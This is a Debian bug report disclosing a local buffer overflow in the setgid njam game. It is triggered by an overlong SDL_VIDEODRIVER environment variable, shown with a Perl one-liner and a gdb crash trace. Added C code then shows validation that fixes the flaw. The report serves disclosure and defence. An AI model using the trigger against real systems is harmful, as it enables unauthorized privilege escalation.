Package: njam
Version: 1.25-5
Justification: user security hole
Severity: grave
Tags: security

*** Please type your report below this line ***

The setgid(games) binary /usr/games/njam makes insecure use of the
environment variable SDL_VIDEODRIVER.

This potentially allows the execution of arbitrary code, as the
following example shows:

1.  Set up the variable:

    birthday:~# export SDL_VIDEODRIVER=$(perl -e "print 'x'x300")


2.  Launch the binary under gdb so we can see what happens:

    birthday:~# gdb /usr/games/njam
    (gdb) run
    Starting program: /usr/games/njam
    ..
    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000404f48 in ?? ()
    (gdb) bt
    #0  0x0000000000404f48 in ?? ()
    #1  0x7878787878787878 in ?? ()
    #2  0x7878787878787878 in ?? ()
    #3  0x7878787878787878 in ?? ()

  0x78 == "x" == Code execution via overflow.


  This is probably a minor issue, but should be simple to patch.

-- System Information:
Debian Release: 6.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages njam depends on:
ii  libc6                        2.11.2-10   Embedded GNU C Library: Shared lib
ii  libgcc1                      1:4.4.5-8   GCC support library
ii  libsdl-image1.2              1.2.10-2+b2 image loading library for Simple D
ii  libsdl-mixer1.2              1.2.8-6.3   mixer library for Simple DirectMed
ii  libsdl-net1.2                1.2.7-2     network library for Simple DirectM
ii  libsdl1.2debian              1.2.14-6.1  Simple DirectMedia Layer
ii  libstdc++6                   4.4.5-8     The GNU Standard C++ Library v3

njam recommends no packages.

njam suggests no packages.

-- no debconf information
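An added illustration, not code from njam or SDL (function and constant names are hypothetical), of how a setgid program should take a driver name from the environment: bound the length, restrict the character set, and ignore the variable entirely when the process holds privileges its caller does not.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical bound: real SDL 1.2 driver names ("x11", "fbcon", "dummy", ...)
 * are all far shorter than this. */
#define DRIVER_NAME_MAX 16

enum driver_status {
    DRIVER_OK = 0,
    DRIVER_UNSET,          /* variable absent or empty */
    DRIVER_TOO_LONG,       /* would not fit in the caller's buffer */
    DRIVER_BAD_CHAR,       /* something other than [A-Za-z0-9_] */
    DRIVER_UNTRUSTED_ENV   /* running setuid/setgid: environment not honoured */
};

/* Copy a driver name into a fixed buffer, refusing anything that does not
 * fit or that is not a plain identifier. Never writes past outlen bytes. */
int validate_video_driver(const char *value, char *out, size_t outlen)
{
    size_t i;
    if (outlen == 0)
        return DRIVER_TOO_LONG;
    if (value == NULL || value[0] == '\0')
        return DRIVER_UNSET;
    for (i = 0; value[i] != '\0'; i++) {
        unsigned char c = (unsigned char)value[i];
        if (i + 1 >= outlen)          /* leave room for the terminator */
            return DRIVER_TOO_LONG;
        if (!isalnum(c) && c != '_')
            return DRIVER_BAD_CHAR;
        out[i] = (char)c;
    }
    out[i] = '\0';
    return DRIVER_OK;
}

/* A setgid(games) binary inherits its environment from an unprivileged
 * caller, so the variable is only consulted when no privilege is in play. */
int video_driver_from_env(char *out, size_t outlen)
{
    if (getgid() != getegid() || getuid() != geteuid())
        return DRIVER_UNTRUSTED_ENV;
    return validate_video_driver(getenv("SDL_VIDEODRIVER"), out, outlen);
}
```

On glibc 2.17 and later, secure_getenv() gives the same "ignore the environment when privileged" behaviour at the library level; the glibc 2.11 in this report's Debian release does not have it.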
